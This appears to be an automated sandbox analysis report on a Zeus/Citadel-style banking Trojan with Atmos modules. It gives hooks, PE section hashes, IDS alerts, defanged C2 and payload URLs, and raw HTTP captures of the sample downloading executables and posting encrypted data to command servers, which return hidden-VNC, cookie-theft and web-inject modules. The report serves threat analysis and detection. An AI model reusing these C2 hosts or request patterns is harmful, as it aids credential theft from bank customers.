The Trojan installs the following user-mode hooks in kernel32.dll:

ExitProcess
GetFileAttributesExW

The Trojan installs the following user-mode hooks in ntdll.dll:

NtCreateThread

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 254048 254464 5.09777 a77de89eaf55b3a6eb3c86e9e2fcfdcd
.data 262144 12752 3072 2.67156 585d91141ce4dcbc0176d6d4a54475b4
.reloc 278528 9306 9728 4.20519 ecd715ec6d1021452fd0957d69ffac60

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.cpro.moscow/kent/file.php 195.242.161.117
hxxp://www.google.com/webhp 173.194.113.209
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP 173.194.113.209
hxxp://www.cpro.moscow/kent/exit.php 195.242.161.117
hxxp://changeexchange4.ru/new.exe 194.28.133.91
hxxp://changeexchange4.ru/bindata865.exe 194.28.133.91
hxxp://microsoft.com/ 134.170.188.221
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe 23.64.226.15


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Generic - POST To .php w/Extended ASCII Characters
ET TROJAN Generic -POST To file.php w/Extended ASCII Characters
ET TROJAN Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment
ET TROJAN Zeus Bot GET to Google checking Internet connectivity

Traffic

GET /bindata865.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: changeexchange4.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 20 Sep 2015 13:52:44 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 20 Sep 2015 12:45:22 GMT
ETag: "1c795a1-6242c-5202d2355dc80"
Accept-Ranges: bytes
Content-Length: 402476
Connection: close
Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......O.......{.......R.......B...............z.......K.......L.....Ri
ch............PE..L......U..........v..................N............@.
.........................`.......Y.... ...............................
........... .......................@..................................
....h...@............... ............................text...A.........
.................. ..`.rdata...!......."..................@[email protected]...
[email protected]..........................@.
...rsrc........ ......................@[email protected].......@..............
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
.............................................C.1..:H\\......<.o.8..
l..P..H..t6D.o.o..`= ^p|..Q_........6..L.N).....x@=.............<.)
T.!P.o....o.o..n........T:..:../U:i|.:......).o.o..).........L:.....=.
.........T\...........T......S.M.....].....(^.....w.T..]....X\.......x
.!T\S..\\\..T........._.`........._.$........._.|........._.x.........
_.@......\\\\.U.....].........g.D/.........._P.......................g
.P)}......S.X............._X........X..o.....T\....................L..
P......\\\\...\\\\...\\\\.U.....]......g..!...T_..S.T..LS...S...o.
<<< skipped >>>


GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Sun, 20 Sep 2015 13:52:51 GMT
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........#pA.B...B..
[email protected]............
..............PE..L....jkG.............................c... ..........
. ................................^.......... ........................
..............x.............]. ........... "..........................
.....&..@............ ...............................text........ ....
.................. ..`[email protected]...
x........H].................@..@......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................l...V...:...".............
..................|...................................(...r...d...T...
....*...........P...j...................<...................\......
.................................>...L...^...n.....................
......................2...L.......h...p...............................
........(...>...L...`...v...................................N...>
;...,...................d.............................................
..............z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>


GET /webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cache-Control: no-cache
Host: VVV.google.com.ua


HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Sun, 20 Sep 2015 13:52:43 GMT
Server: gws
Content-Length: 281
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1442757163:LM=1442757163:V=1:S=wshWM2whNkU12bKk; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=71=XMvwuHf2AYJf-H3X3-9LfytjOF82Yzw25AX3pFcNMCLiNicEeMbCMUhD08OlXnPMnRnB1gMsrYgzsDMrDnawfCkk256_UD-JSIIkHgUhE5AvWpL0AXPpZ_O_3349_pir; expires=Mon, 21-Mar-2016 13:52:43 GMT; path=/; domain=.google.com.ua; HttpOnly
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-Va
H8KMSAYPvqs9AP&gws_rd=ssl">here</A>...</BODY></H
TML>....



POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 132
Connection: Keep-Alive
Cache-Control: no-cache

....$..0..<l..t-..st....sQs.p..YN..(m=..l.%..T.)..f....r.Xe3.9
*<...=.X..z..."Yc1...V,...2g.t\H0Z..9.. .x.eV.%.1.|TO....q.....
.....
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 14144
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/kent.xml"
Content-Transfer-Encoding: binary
1....Z.ec...4.....|}..W.X.~."........*..?n.#M..EW.S.n..Xf..p5[.%.O..x5
...q...]...q.!\.l.z...E..i...}...P...e..u..h.dg,b..=..A..I...U.RC.S..B
....9.B;...]b......-..4z^.l.............0.=...........YY..... Y4z$....
..t...o...C}*.j....9...6.N.......?...M.?'X..b.........K..!..$2x...K..^
..._......s.w...U.=.K..\..Su1..=.bB^.N.J.....l...?...S......F.E..%..E.
.. S_x.]...g.,T.B..V5;..)=.b.0@!....v3sBL)....d....%F]..2.H}.......U^.
Bt...)..m...p0.M..%..K.9.N....N.u..<.. {.rl .....O....iq...Y.#;^6..
..`.~,z.Y..HZ...3...Y...~('.9...d.u"...........TJ.*.<.N.xQ/TH(.....
..>p,..M/_..O....f.........K.C..'....q.[2aHm/s.J.DS....7z......._..
...,.(..!JG.#..cB.....0.....=.g....t...%a..."6..!bxj/.<.!..........
E..$]......_J..3Vu.tm...........J-.w..u.h..3...T....rlU..f.a@r^0....6!
..Q_ .o...G..e._qXE........{...F.....d..qv....X.[@}..|..-.:JKO..h.....
...;...$.....................R.f....O..n.....Oz.@?..7.Ee.#~G.......5;.
..f.9.z:..w...#I....;.a.........Vs..s.i^. r..#.&...!.A....K%......z.F.
...>]....a/4.../..L.VC?...4l ..!..... .UI....a.."f....g..k.=qj.n\..
..t.?p=..=}m..k.P.........P...R..tJE.gk..O.......Am..T..1.o....E..)w..
9fu.?...zGn........w.U~S.>3I.......i4.H.D..-KD~f.,H.K....n...9..w..
.4.g-.....L)s.ueYU....b..f.\. ..b..IK.Sxi:.."..j.X..W.^&*.....s..Rb-.j
.v7.vM.....N.eM]..;.va..K.].{Z.M....T..RO......L.*-.....k~;.P...Z.1k=.
fx..P%.kf..w#...=.. ....D..o....$..?x>yy.:..:@..2.#Jq.I(.T8.%..Y...
@[email protected].;}.3/..i...X.'....G].ET..2k....u..3.M.d)...n9.
.Z.....(O..d98.2...u...].z.mw.....\F..:. ....L.q.....-......k?.B..
<<< skipped >>>

POST /kent/file.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

1......wf....a.se.......De.7...0......e...w..Q.F.....H..N..)....o.......g... .R...)..R......:....#Gb|. .....lQK.d./.TQ.\rzx...,K.([email protected]>
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 221468
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_ffcookie.module"
Content-Transfer-Encoding: binary
.....Qp.d8... ^c.PK..Q^/-...vii..'E.......a.K..........a[.......F5...}
.%.......j..b...Rq......k.....DC.Y.l.|..6_...1....U..}...WjB|..3%.....
hh....}R.r;1..CV%Q.gM....._.......}xo...(.......$.=Y....z....X...2....
O..>.Ijg.....o...Mx80.&.C.Ti....CL....0..x....I7wN5...ei.$.... *..)
......m.Y...."....PRPk..........8............s.)...a...Ul.B...........
.l......X.~..L..A...x`)..z(....2)..Rqvx.S..{K."........k..L.....9...[.
.Y...&..D..m.J..fNN..Y..c..u.a...W43XphI.'<v....*.f.E.OYZ..F:.X....
n..B....-..Bu..pw.{#........[5....u..5..X7. .0....|...g.q...I.!...j...
........U....E.^bXr....I.~G"7].(...M.)".BHC.,6!..2.b...K..&.b.#q.s...\
8]...'..lC..w....E.....4.c....c}.@$.w..B...9...o...J....DP.`j.t..n....
..)...T\.a.@..^.=...C..X.U....{......(.[...$S....PL.h...6.(....{.t..Y.
..1.r......T.....k.....1..l..C.C..b"Q.Z...A.K`.]:C.....N....o)....7.y.
..E..8..W...x...j........d..Y.../.sid.g..H.Y.`.....hC.W.......v...v..j
...&......S.c...X...ky...nE\.QZ....&.8x.nT.*...u.....<.....U.!.....
....4...us..?......1........W..*YC.......RS3.p..q^.....$.S.=....c..U..
E......-....O..v.w.Y.......*.....G...Tq...6......Z....B.[........ ,..a
..A..a.....R.B....m'.h..[[email protected]....\^.o.". .e...x....
...E.........<i6Y>........k.t...R&..#}.].g........1....:...(.;..
........"......EQ5.........R". ..~.4F......r...x..".`y(...l..a{'.E..._
#._...u=.|."d m>..0&........%..x.tv....x./g.Ty.=..).*Bu7t0..-....&l
t;..l.O.m?.].'....5.8....;....%.4y.M..p.Q^&.....n..@..|V.(._e...M..0..
.sl.|y......&.3b]Z.O..a.........G.. F.2.......;%R..L7.{.(s...<_
<<< skipped >>>

POST /kent/exit.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 404
Connection: Keep-Alive
Cache-Control: no-cache

I>.d....G.J.]...<.!.X..B..Cp1?....(.R..*....d..=....9h....E
...-c3......8....4...|O.....p.:.Sp5..m
..&..y..E3..q.$...\.B.`7.|w...
...n........T...t.U...L..Cb.Qq
_.).....h.%s.b..0.,?jEQ......|Va......<.du.C...3...N...0]A..S....Q{[email protected]`nI....8.".{:0.l..5A.]...8..#. p."lDn.....qg:.q*...W.`[email protected]?.R..$.V$....g......c.M.C..._..c<.... ...&.]..r.2..Z....T.]A.n....k*...?. .....u7..8.'..<...=vvb
.%1
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 305
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.2._.7......b...3.{.J.k...........s.{(A3.a^...N._..[f...I....l.<%.5
...q...C..2............no`...............K..3...3......_..M..H.,1gI.v.
...o..bOP........o....[......zy.s....] ..G2.....-.........;C..oc....hh
.M....~O 2...`......&...SpH.....*..4. ....[....Ez.......-i.(....}.u{..
..<./17.JS.:H.h!v......s....HTTP/1.1 200 OK..Server: nginx/1.2.1..D
ate: Sun, 20 Sep 2015 13:52:44 GMT..Content-Type: text/html..Content-L
ength: 305..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.
1..Vary: Accept-Encoding...2._.7......b...3.{.J.k...........s.{(A3.a^.
..N._..[f...I....l.<%.5...q...C..2............no`...............K..
3...3......_..M..H.,1gI.v....o..bOP........o....[......zy.s....] ..G2.
....-.........;C..oc....hh.M....~O 2...`......&...SpH.....*..4. ....[.
...Ez.......-i.(....}.u{....<./17.JS.:H.h!v......s........


POST /kent/exit.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache

.PLr...`..\...E_%.hO..pC{ny.....
89. C7%d/..;.".7.......e.1...._.i`..O.f.. DR..5B.....2]...,9.8...q....W._....zq
w..7.C...sN\D....7.3..Ajoq.h.S/.2....a1........TF..m./s.n.e_
G.M..M.?!.../.j..i".>.bR..8%C..l=.j8.Hw.M...5Gkb
o.&....Fp...
@...u.E..;k....7l...6..0...'-..;.....
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
 ....]..Q.....X.V..MBc.i.%...).... ._73,..&.|..G5.1].h>5.)...K.5...
...A.6.E.....


POST /kent/file.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 147
Connection: Keep-Alive
Cache-Control: no-cache

._..1.G.S.....Zw%A.X~"...<.J;....=.. >(..;>{_f.2...Jb:..h.?...bV.)vT(..W|..D..E._.R.....#..C.h........q....w..X{..PX'.,&....[r.zk.qi.......aE...|.
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:45 GMT
Content-Type: application/octet-stream
Content-Length: 9887
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/webinjects/merged-1.txt"
Content-Transfer-Encoding: binary
.[}.h3....H*{.1..;.E...b...K!Hi....4t"..Jx.l4...k..}[email protected] ...w.kM.ts.R.
...|i..uH.r!c........Pk...6.w.P:...zWpt....Y.-...)...i....y"..vyn.J.z.
......vR...........yB.....d\....nh..[.e.}.?Y.g\8Fd[J.#..s.~....H.~H...
~g..er.,....&1...Ggg..!..1fw .y?j.|.E2i_.^.l...Gn.........wD._B;..h01Y
..v..U:..2.4..U.....?.>.Pn...Vy.g..."g.l.60.h8i.`.......5..B.XwS.U.
....X<:...<.(.l..&d:.to.........b.....U...<....d.xf....K.sq[F
....1\]..=Z&..|..~......E........MPt.#D....,3.*..:5...d.]..Z.........Y
jR.....*\.M.,..#/j.....f=....L7...,C..z..{...s1.X...Q~'.:>..ln..&..
...a...).j..G...............RLk.&..bs.mN...6{.e..r..I~`,..G...*W.. ..7
.k.v....Wr..P....(^.K........-..Lw.....{br...U!5. L'....?.....p..../.}
3...\;..&h6'2..<..E..ZN...o.|.,.....6eb......|1...!.$....<.,.q.C
....-..q..X..T.6....G(.."...Hc..d.........r.;U..7q..,.6c...e$p.[.J..l.
...x..7.D..% ..(..]..rJ-g..V}_.B..m...5q.. ..Q....NX%..v..n._A...G....
(). ~.}:}...*..#..&U........gQbh).d.R".u.G.z)\.."..!H.\.......8. |....
.#.yR.|..Qp....v.k\.BeE...U3..=.g..lR.DL.....3o..i.\?6[..0..f..E.0.i.B
[email protected]..=..#..1...).XN.2._>>5.....B..?/.,.aF.....'.
S...N{....;..Z...1.....%.v.?{[email protected]|..O.i.(.....Lk.-t.7...A........&g
t;r...v....19.-VT./....U|M..Niu.`...?r\.o..j;`..[.n.k@..|..i.~...j$...
.5#(..7..._.U..nl......OH....'.`V.DN5<QyE=....'5e....x......|4..P..
.G...N.GI...e....,...K^/........u,k..sD=.....L.NR.>.....]Q...&.]0..
..k.W.:.k'.Q.i....6,-Qp~!{qkr.:..."....-.........tD...zD!.c....vHM.?.*
..^..J....X.5.<.u........c7...7jo.dm.(BB..0......I...h.....q&q 
<<< skipped >>>


GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Cache-Control: no-cache


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP
Content-Length: 265
Date: Sun, 20 Sep 2015 13:52:43 GMT
Server: GFE/2.0
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH
8KMSAYPvqs9AP">here</A>...</BODY></HTML>....



POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

.....HQ..K4.fR......2.44S..kq..@I3.;..u.k.>...c...*.....s..Y#Z.....i&|GC)T>*E.&..ic..'b..d.&...Av...&....g ..MO.zm.[.K..}
..2a.? 4c.T..^.TO
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 174876
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_video.module"
Content-Transfer-Encoding: binary
.....Qp.d8........'(.e..........4".,.NA...7.H.j...C....4.zR..T8..X...V
.*.....<...0.$.S0...uq.z.kv..>.7.YF(..U.3su.DE,\A....{Q{}.[.]..Q
.C..aW..,r%'N..*....M.Y.....^4..*~...NO..,"d./..s<GRR.Pb..1F....\t.
CX..f.~mjL.:%,....[[email protected]..;2........]........<.
Z..3....\.5e..N...p....!;.d/...gy....=..Q.%3./.b... .<.d.R.{'.".#.L
C-...]....&w.R.unO.).M=.i$.w....&....j%2?.. .c|;6h.eK.k.....G...J...*.
 .U.2.r&6-j....TN...2...XI...M.......uC.T.Y... [email protected].
..b)>".%u..-.....e...o.d.mV..(......D..F.p&..{.i.G&..Z....?EV.V:.SB
.W.g...|u.....Y.U..G.>j..g....ClX..........u.....W.......z.f....]K.
4.6#.B...Q&.PQ5......:..... ......Z.6..}.e.o...~.R.._i:...4.. =[}.@o..
.W...!..[.$@....,Y...v...UP...... ...[IZ.(B...3. ..VotAq#....."P...U.-
.#...K.^,x4R-.`q.<,bE....?..g..g.;...KHs.?..... j`.I.q.=V.|...MI...
........^.4V.N.f......IOt..4`.."*[email protected].`. ...iS......G..,....1.X.i....
...p.c....0.,..z.....j.......t..Q.T.8...A........).).#...i..$9...."OV.
Qn.......^.M..V...~B....:...9C.l5 ..Y.|........l.t.&...:u..z..I....'..
.)...l...l;.3 ....`.R.tf."([email protected].../...C.d.y%...>..\...J.ca...
..{......1_..8P$....ob....w.4....`gi..*)E...I...E...n.`.6.....^-.....d
.:I.\..\3....#kx1... 2..T...(KY=v.......y...P2.JFs..H...u1..F.U..o.3.&
.#.D.t$...AP. ....F.PC...#......T./...e.7. ......a.p.g.C\=.i7}5..5...,
.Ew..b..$.D....m.-[....G.3.U........ e!Y?....2*..wc.af....xmH...O.T`..
....k...7..2.%bI..K.....E~..F=....3.....M.xY........<....($..Q..C..
RH.G(t.e...t/Wf,. ..G.o.I.*..HB.F.(..t.[.t.1=..O..../..Lj^.[.,].].
<<< skipped >>>

POST /kent/file.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

fOg..3<.Z...=.Wv....b.:.$..4..0Y.....k.. .[...|..j...l..=-.;
N......*.x...?3D...J3?......V...b..I......#fF.&*v..............V./....8.`./..%
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 225052
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_hvnc.module"
Content-Transfer-Encoding: binary
.....Qp.d8........f.U....y...c.l.C.e..|k..1.@.._.CF._:.l.;0U^."}..J..f
...3K._I.........f. h....^0..(..7..k.J<.Q .R..\`.t. .c.../.a6..%.D.
.}b.V{<%.7qX,......A.......!.F>_.O..P...#.DS7.............Z,....
..!...\.cS......[|......p.K.Y...P.V..x.Y..^"P.I?.7oj>...h.x........
.Q ./.......;,NF%Wf.YOQ.*z.l"...........w.....>.d...........rY,.c.(
H..^h... .....}.%Z.....H<...g.:t{2l.Y.r6.....x.....q,kW...thS.....1
....S .5.Cb.b.O.?....s....*d\..#...2u..cDFY$......Bp....*......p#.u...
.6....WU.;F..l.......c>z....D.H.WJ-.2U........>.......D.........
..x9..R......'.5..,..;..... .M........"O.........B....-^#;.A.._*lb.6IP
.'.k.o.......9<.>g......P..T.p.t..,%.......a..#.~.r84.._.....U..
LI.....!.....5..D.....`...A..g.4.0~6.....!...M.I.O....4..]65v......]..
[email protected]........... ...R..7>.....4.C..a.qw)B......./.P.....x....x)w
.x..e........r....4j......`Ms...E.....#..x0..$.ix...N..70Ug...G0.{-.ZF
.R.-....?.......8p.......j.|q.9.{[email protected]]...X.Y/.^.....&$Az\....e....
i.P.%....../.B./.QE.2V0..A.h!....,...L-. [email protected].~..
.N-..h.:#....A.Bh.L..-W..7....r?%.ZHq.G..q.O.t6."G.M?.1.h......Ap?.1T 
...B.H...e........A.q.3.W.......`....W..?..6.;.....p.U....$.....G....x
.........4.......=a.-. D.G.PI..........Z..G..!...~#..G..,....enp..?..,
.Z..2&h..h..{.......&K....z..QJ..n.O....._B......f.....E.l./.>N.8.N
..#R'....?HjH......ll.M../n.X..........fF..........P.]:j..}..._..2.x..
.N0.h<.#o.3....9(..w..../.'.U..9..%...K.a....X...VD#......;.6;:..7.
..Y[.......3.c..F(.....Rc..`t.Gb%j.M....V..$S....o..f-...rA..k...^
<<< skipped >>>

POST /kent/exit.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache

.,.5...n
.aQ..M...n..Y.mR.Nlx..U...7....P..A..........v.....^.i.e6....;[email protected]~...:z}4...."..!.$ic".s)....D[...f.......T%......c.v...9{......v.t.eB....b.Y%...G.dmt...6.8.7.....J..c....f!..R.R' .^p.........".5Y....gg.....`....r...6...~. ......
{[email protected]..
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.).O/,[email protected]'`8..0....=.9.H.....=f.1..c..# .*[email protected]. ..35.<.
....('..VHTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 
13:52:44 GMT..Content-Type: text/html..Content-Length: 76..Connection:
 keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encodin
g...).O/,[email protected]'`8..0....=.9.H.....=f.1..c..# .*[email protected]. ..35.&l
t;.....('..V....


POST /kent/exit.php HTTP/1.1


Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache

e..Gp.O..rr..#.D)..v7.\.^l.?..H.d..3fS'...>k.n..R.MD...E....~....R.0..q..p
..k.\$6.......7?z].b~C......./ .n.^;'3.._.A<<.uu...!Xl0A..
0..!N.?..:I
n.p..!V..K.m.x$.)c.l.f..px..(\.....;;sg.R|.....*9...`........
...A..7..0..6.7[.-~Vr.ie`y...>d.P...An...O... .........](t.7.7..}%X
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:45 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...
;..h..HTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:
52:45 GMT..Content-Type: text/html..Content-Length: 76..Connection: ke
ep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding..
.M.z.!.....{.#...Z.."3u..:....S..m.K....U....i.~G......(d...M)w5.Xe...
;..h....



GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sun, 20 Sep 2015 13:52:49 GMT
Connection: close
Content-Length: 148
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.microsoft.com/">here</a></body>..



GET /new.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: changeexchange4.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 20 Sep 2015 13:52:44 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 20 Sep 2015 12:45:08 GMT
ETag: "1c795b9-23fa8-5202d22803d00"
Accept-Ranges: bytes
Content-Length: 147368
Connection: close
Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......O...........
............D.......=.......Rich............PE..L...c..U..............
[email protected].......
................................D...(........................?........
..........................................(... .......................
.............text...H........................... ..`.data.............
[email protected]...............................@..@l.[J....
........MSVBVM60.DLL..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

regsvr32.exe_3264:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
